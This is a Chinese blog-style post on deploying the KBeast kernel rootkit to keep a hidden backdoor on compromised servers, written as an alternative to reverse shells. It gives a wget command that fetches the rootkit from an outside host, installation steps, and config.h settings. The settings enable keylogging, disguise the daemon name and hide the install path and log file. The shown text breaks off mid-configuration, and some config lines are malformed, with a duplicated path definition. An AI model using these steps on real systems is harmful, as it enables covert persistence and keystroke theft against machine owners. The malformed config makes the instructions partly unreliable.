天天看點

rootkit 變種 試用筆記

很多時候反彈shell還是不太友善,需要一個外網IP,要麼自己有路由器的權限,做内網映射,而且用自己家的ip是不太穩定的,如果沒有權限,總不能arp欺騙吧,如果有路由器權限還可以用花生殼做映射。都不是完美的解決方案,應該直接寫入後門,不用做反向連接配接是比較好的,反彈shell的話,有可能會擁有添加賬戶的權限,也可以去嘗試,如果不能的話,隻能維持後門了,聽說roobkit特别強大,就花時間研究了下,網上都寫的不細,實際中成功的機會不大、

開始是用的kbeast,看了網上寫的參數介紹不太全,在這裡補全一下:

首先下載下傳、解壓、進入目錄、編輯配置檔案:

wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz

tar zxvf ipsecs-kbeast-v1.tar.gz

cd kbeast-v1/

vim config.h

#使用鍵盤記錄可能不穩定,推薦開啟

define KEYLOG TRUE

#定義守護程序的名字

define KBEAST "sheller"

#定義程式路徑,防止被誤删或者清除

define _H4XPATH "/usr/rootkit"

#會在這個路徑儲存日志,必須使用_h4x_路徑

define _H4XPATH "/usr/h4x"

#此處産生的日志檔案是隐藏的

define LOGFILE "access_log"